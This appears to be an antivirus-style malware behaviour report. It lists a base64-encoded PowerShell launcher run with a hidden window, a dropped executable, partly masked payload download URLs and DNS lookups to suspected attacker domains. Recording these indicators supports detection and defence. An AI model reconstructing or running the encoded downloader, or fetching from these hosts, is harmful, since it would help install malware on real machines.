Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...
- %HOMEPATH%\979.exe
- http://bs##000.com/aspnet_client/bw/
- http://ba###boom.com/zxwxo/qkm/
- http://ko######-sarzamin-man.ir/wkyhhb/d2djxo/
- DNS ASK bs##000.com
- DNS ASK ba###boom.com
- DNS ASK co######ptingbangkok.clinic
- DNS ASK vi##.com
- DNS ASK ko######-sarzamin-man.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...' (with hidden window)